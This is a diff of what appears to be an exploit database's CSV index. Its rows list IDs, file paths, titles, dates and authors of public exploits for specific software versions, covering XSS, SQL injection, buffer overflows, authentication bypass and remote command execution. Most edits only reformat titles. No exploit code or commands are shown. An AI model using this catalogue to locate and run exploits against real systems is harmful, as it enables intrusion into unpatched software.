23810,platforms/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 - emumail.fcgi Multiple Parameter XSS",2004-03-12,dr_insane,cgi,webapps,0 23811,platforms/linux/remote/23811.c,"MathoPD 1.x - Remote Buffer Overflow",2003-11-02,aion,linux,remote,0 23812,platforms/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",php,webapps,0 -23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0 +23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0 23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - fname Parameter XSS",2004-03-15,"Janek Vind",php,webapps,0 23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - displaycategory.php basepath Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - modules.php gid Parameter SQL Injection",2004-03-15,"Janek Vind",php,webapps,0 @@ -21036,13 +21031,13 @@ id,file,description,date,author,platform,type,port 23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - CSRF Resulting in SQL Injection",2013-01-02,"Joshua Reynolds",php,webapps,0 23830,platforms/linux/dos/23830.py,"Astium VoIP PBX 2.1 build 25399 - Remote Crash PoC",2013-01-02,xistence,linux,dos,5655 23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit",2013-01-02,xistence,php,webapps,0 -23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0 +23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 - UDP Datagram Handling Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 - Index.php SQL Injection",2004-03-16,JeiAr,php,webapps,0 -23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0 +23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0 23836,platforms/windows/remote/23836.txt,"IBM Lotus Domino 6/7 - HTTP webadmin.nsf Directory Traversal",2004-03-17,dr_insane,windows,remote,0 23837,platforms/windows/remote/23837.txt,"IBM Lotus Domino 6.5.1 - HTTP webadmin.nsf Quick Console Cross-Site Scripting",2004-03-17,dr_insane,windows,remote,0 -23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0 -23839,platforms/windows/dos/23839.pl,"GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 SITE Command Remote Buffer Overflow",2004-03-17,storm,windows,dos,0 +23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0 +23839,platforms/windows/dos/23839.pl,"GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 - SITE Command Remote Buffer Overflow",2004-03-17,storm,windows,dos,0 23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0 23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,aix,local,0 23842,platforms/windows/dos/23842.pl,"WFTPD Server GUI 3.21 - Remote Denial of Service",2004-03-17,"Beyond Security",windows,dos,0 @@ -21052,13 +21047,13 @@ id,file,description,date,author,platform,type,port 23846,platforms/windows/dos/23846.txt,"Symantec Client Firewall Products 5 - SYMNDIS.SYS Driver Remote Denial of Service",2004-03-18,"eEye Digital Security Team",windows,dos,0 23847,platforms/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,windows,remote,0 23848,platforms/linux/remote/23848.txt,"SquidGuard 1.x - NULL URL Character Unauthorized Access",2004-03-19,"Petko Popadiyski",linux,remote,0 -23849,platforms/linux/local/23849.txt,"FVWM 2.4.17/2.5.8 fvwm_make_browse_menu.sh Scripts Command Execution",2004-03-19,"Dominik Vogt",linux,local,0 +23849,platforms/linux/local/23849.txt,"FVWM 2.4.17/2.5.8 - fvwm_make_browse_menu.sh Scripts Command Execution",2004-03-19,"Dominik Vogt",linux,local,0 23850,platforms/windows/dos/23850.txt,"Microsoft Windows XP - Explorer.EXE Remote Denial of Service",2004-03-19,"Rafel Ivgi The-Insider",windows,dos,0 23851,platforms/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - news_view.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23852,platforms/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - resend.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - error.asp err Parameter XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - register.asp err Parameter XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 -23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0 +23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0 23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,Metasploit,php,remote,0 23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - comment_add.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - search.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -21072,8 +21067,8 @@ id,file,description,date,author,platform,type,port 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injection",2004-03-23,JeiAr,php,webapps,0 23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - Comments function id Parameter SQL Injection",2004-03-22,JeiAr,php,webapps,0 -23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 -23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0 +23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 +23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0 23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0 23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote,0 @@ -21083,7 +21078,7 @@ id,file,description,date,author,platform,type,port 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Remote Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun and Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 -23882,platforms/linux/local/23882.pas,"NetSupport School 7.0/7.5 Weak Password Encryption",2004-03-26,"spiffomatic 64",linux,local,0 +23882,platforms/linux/local/23882.pas,"NetSupport School 7.0/7.5 - Weak Password Encryption",2004-03-26,"spiffomatic 64",linux,local,0 23883,platforms/aix/local/23883.pl,"AIX 4.3.3/5.1 - Invscoutd Symbolic Link",2003-05-29,watercloud,aix,local,0 23884,platforms/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service",2004-03-26,"laurent oudot",linux,dos,0 23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0 @@ -21098,10 +21093,10 @@ id,file,description,date,author,platform,type,port 23894,platforms/cgi/webapps/23894.txt,"Cloisterblog 1.2.2 - Journal.pl Directory Traversal",2004-03-29,Dotho,cgi,webapps,0 23895,platforms/asp/webapps/23895.txt,"Interchange 4.8.x/5.0 - Remote Information Disclosure",2004-03-30,anonymous,asp,webapps,0 23896,platforms/linux/dos/23896.txt,"MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow",2004-03-30,blexim,linux,dos,0 -23897,platforms/cgi/webapps/23897.txt,"LinBit Technologies LINBOX Officeserver Remote Authentication Bypass",2004-03-30,"Martin Eiszner",cgi,webapps,0 +23897,platforms/cgi/webapps/23897.txt,"LinBit Technologies LINBOX Officeserver - Remote Authentication Bypass",2004-03-30,"Martin Eiszner",cgi,webapps,0 23898,platforms/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection",2004-03-31,"Nick Gudov",asp,webapps,0 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting",2004-03-31,"Nick Gudov",asp,webapps,0 -23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow",2004-03-31,"Shaun Colley",hardware,dos,0 +23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 - Console CD Player PrintTOC Function Buffer Overflow",2004-03-31,"Shaun Colley",hardware,dos,0 23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0 23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 - Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0 @@ -21119,11 +21114,11 @@ id,file,description,date,author,platform,type,port 23916,platforms/windows/dos/23916.txt,"Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23917,platforms/windows/dos/23917.txt,"Panda ActiveScan 5.0 - ASControl.DLL Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23918,platforms/windows/dos/23918.txt,"Panda ActiveScan 5.0 - ascontrol.dll Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23919,platforms/windows/dos/23919.txt,"Symantec Security Check Virus Detection COM Object Denial of Service",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 +23919,platforms/windows/dos/23919.txt,"Symantec Security Check Virus Detection - COM Object Denial of Service",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23920,platforms/windows/dos/23920.txt,"Mcafee FreeScan CoMcFreeScan Browser Object Buffer Overflow",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 23923,platforms/windows/dos/23923.py,"FoxPlayer 2.9.0 - Denial of Service",2013-01-06,metacom,windows,dos,0 -23924,platforms/multiple/webapps/23924.txt,"Nexpose Security Console CSRF",2013-01-06,"Robert Gilbert",multiple,webapps,0 +23924,platforms/multiple/webapps/23924.txt,"Nexpose Security Console - CSRF",2013-01-06,"Robert Gilbert",multiple,webapps,0 23925,platforms/windows/dos/23925.txt,"Kerio Personal Firewall 4.0.x - Web Filtering Remote Denial of Service",2004-04-07,E.Kellinis,windows,dos,0 23926,platforms/windows/remote/23926.txt,"Mcafee FreeScan CoMcFreeScan Browser Information Disclosure",2004-04-07,"S G Masood",windows,remote,0 23927,platforms/windows/dos/23927.txt,"Opera Web Browser 7.0 - Remote IFRAME Denial of Service",2004-04-08,"Pascal Notz",windows,dos,0 @@ -21190,7 +21185,7 @@ id,file,description,date,author,platform,type,port 23991,platforms/php/webapps/23991.txt,"Tutos 1.1.20031017 - note_overview.php id Parameter SQL Injection",2004-04-13,"François SORIN",php,webapps,0 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection",2004-04-13,waraxe,php,webapps,0 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 -24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service",2004-04-14,"Paul Szabo",windows,dos,0 +24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 - MIME Message Nesting Denial of Service",2004-04-14,"Paul Szabo",windows,dos,0 23993,platforms/php/webapps/23993.txt,"Websitebaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G - Directory Traversal",2013-01-09,"Dhruv Shah",hardware,webapps,0 @@ -21209,17 +21204,17 @@ id,file,description,date,author,platform,type,port 24011,platforms/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 - Malformed STUN Packet Denial of Service",2004-04-08,storm,multiple,dos,0 24012,platforms/windows/remote/24012.html,"WinSCP 3.5.6 - Long URI Handling Memory Corruption",2004-04-16,"Luca Ercoli",windows,remote,0 24013,platforms/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service",2004-04-17,"K. K. Mookhey",multiple,dos,0 -24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 +24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps,0 24017,platforms/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)",2013-01-10,sickness,windows,remote,0 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload",2013-01-10,Metasploit,php,remote,0 -24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,Metasploit,multiple,remote,0 +24019,platforms/multiple/remote/24019.rb,"Ruby on Rails - XML Processor YAML Deserialization Code Execution",2013-01-10,Metasploit,multiple,remote,0 24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free",2013-01-10,Metasploit,windows,remote,0 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 -24024,platforms/windows/remote/24024.html,"Softwin BitDefender AvxScanOnlineCtrl COM Object Remote File Upload And Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 +24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Remote File Upload And Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24026,platforms/php/webapps/24026.txt,"PHPBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 @@ -21235,7 +21230,7 @@ id,file,description,date,author,platform,type,port 24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 - openwindow.php hlpfile Parameter XSS",2004-04-21,"Janek Vind",php,webapps,0 24038,platforms/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps,0 -24040,platforms/multiple/remote/24040.txt,"PISG 0.54 IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote,0 +24040,platforms/multiple/remote/24040.txt,"PISG 0.54 - IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Remote Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote,0 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read",2004-04-23,"Brad Spengler",linux,local,0 @@ -21262,7 +21257,7 @@ id,file,description,date,author,platform,type,port 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0 24068,platforms/php/webapps/24068.txt,"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting",2004-04-30,"Alvin Alex",php,webapps,0 24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6.0 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0 -24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1 B Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0 +24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1 B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0 24071,platforms/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",php,webapps,0 24072,platforms/php/webapps/24072.txt,"Coppermine Photo Gallery 1.x - menu.inc.php CPG_URL Parameter XSS",2004-04-30,"Janek Vind",php,webapps,0 24073,platforms/php/webapps/24073.txt,"Coppermine Photo Gallery 1.x - modules.php startdir Parameter Traversal Arbitrary File Access",2004-04-30,"Janek Vind",php,webapps,0 @@ -21272,9 +21267,9 @@ id,file,description,date,author,platform,type,port 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal",2004-05-03,"Imperva Application Defense Center",windows,remote,0 24078,platforms/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,linux,dos,0 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0 -24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 LIST Denial of Service",2004-05-04,storm,windows,dos,0 -24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 AddUser.CFM Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0 -24082,platforms/php/webapps/24082.txt,"Simple Machines Forum 1.0 Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0 +24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 - LIST Denial of Service",2004-05-04,storm,windows,dos,0 +24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - AddUser.CFM Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0 +24082,platforms/php/webapps/24082.txt,"Simple Machines Forum 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 24084,platforms/multiple/remote/24084.py,"Nagios - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go param) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 @@ -21284,8 +21279,8 @@ id,file,description,date,author,platform,type,port 24090,platforms/php/webapps/24090.txt,"PHPX 3.x - admin/user.php CSRF Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24091,platforms/php/webapps/24091.txt,"PHPX 3.x - admin/images.php CSRF Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24092,platforms/php/webapps/24092.txt,"PHPX 3.x - admin/forums.php CSRF Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24093,platforms/linux/remote/24093.c,"Exim Sender 3.35 Verification Remote Stack Buffer Overrun",2004-05-06,newroot,linux,remote,0 -24094,platforms/cgi/webapps/24094.txt,"SurgeLDAP 1.0 Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps,0 +24093,platforms/linux/remote/24093.c,"Exim Sender 3.35 - Verification Remote Stack Buffer Overrun",2004-05-06,newroot,linux,remote,0 +24094,platforms/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps,0 24095,platforms/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow",2004-05-06,"Joel Eriksson",linux,dos,0 24096,platforms/linux/dos/24096.pl,"Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun",2004-05-07,"Paul Szabo",linux,dos,0 24097,platforms/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Request Buffer Overflow",2004-05-06,badpack3t,windows,remote,0 @@ -21298,7 +21293,7 @@ id,file,description,date,author,platform,type,port 24104,platforms/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple SQL Injection",2004-05-10,"Hillel Himovich",php,webapps,0 24105,platforms/linux/remote/24105.txt,"National Science Foundation Squid Proxy 2.3 Internet Access Control Bypass",2004-05-10,"Nuno Costa",linux,remote,0 24106,platforms/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant",2004-05-10,Nullbyte,linux,remote,0 -24107,platforms/windows/dos/24107.pl,"EMule Web 0.42 Control Panel Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 +24107,platforms/windows/dos/24107.pl,"EMule Web 0.42 Control Panel - Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 24108,platforms/php/webapps/24108.txt,"CMS phpshop 2.0 - SQL Injection",2013-01-14,"By onestree",php,webapps,0 24110,platforms/windows/dos/24110.py,"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos,0 24111,platforms/windows/dos/24111.py,"Serva 2.0.0 - HTTP Server GET Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos,0 @@ -21319,17 +21314,17 @@ id,file,description,date,author,platform,type,port 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0 24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Include",2004-05-17,waraxe,php,webapps,0 24128,platforms/windows/dos/24128.txt,"ActivePerl 5.x / Cygwin 1.5.x - System Function Call Buffer Overflow",2004-05-18,"Oliver Karow",windows,dos,0 -24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPD 2.x/3.0 Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 +24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPD 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow",2004-05-18,"Matt Murphy",multiple,dos,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0 -24133,platforms/windows/remote/24133.rb,"Freesshd Authentication Bypass",2013-01-15,Metasploit,windows,remote,0 +24133,platforms/windows/remote/24133.rb,"Freesshd - Authentication Bypass",2013-01-15,Metasploit,windows,remote,0 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0 24135,platforms/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,windows,dos,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation Weakness",2004-05-18,"Drew Copley",linux,remote,0 -24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 Embedded Image URI Obfuscation Weakness",2004-05-19,"Lyndon Durham",multiple,remote,0 +24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation Weakness",2004-05-19,"Lyndon Durham",multiple,remote,0 24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - Log.php HTML Injection",2004-05-21,Chinchilla,php,webapps,0 24139,platforms/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple XSS Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps,0 -24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 +24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Local Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0 24142,platforms/windows/dos/24142.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0 24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0 @@ -21346,10 +21341,10 @@ id,file,description,date,author,platform,type,port 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature XSS",2004-05-29,"Janek Vind",php,webapps,0 24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 - SSI.php SQL Injection",2004-06-11,JvdR,php,webapps,0 24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6.0 - ADODB.Stream Object File Installation Weakness",2003-08-23,Jelmer,windows,remote,0 -24188,platforms/cgi/webapps/24188.pl,"Blackboard Learning System 6.0 Dropbox File Download",2004-06-10,"Maarten Verbeek",cgi,webapps,0 +24188,platforms/cgi/webapps/24188.pl,"Blackboard Learning System 6.0 - Dropbox File Download",2004-06-10,"Maarten Verbeek",cgi,webapps,0 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 -24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager CSRF",2013-01-16,"Ramdan Yantu",php,webapps,0 -24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 +24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager - CSRF",2013-01-16,"Ramdan Yantu",php,webapps,0 +24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework - Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution",2013-01-16,Metasploit,linux,remote,0 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0 24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 beta 2 - show.asp show Parameter XSS",2004-06-01,"Oliver Karow",windows,remote,0 @@ -21361,7 +21356,7 @@ id,file,description,date,author,platform,type,port 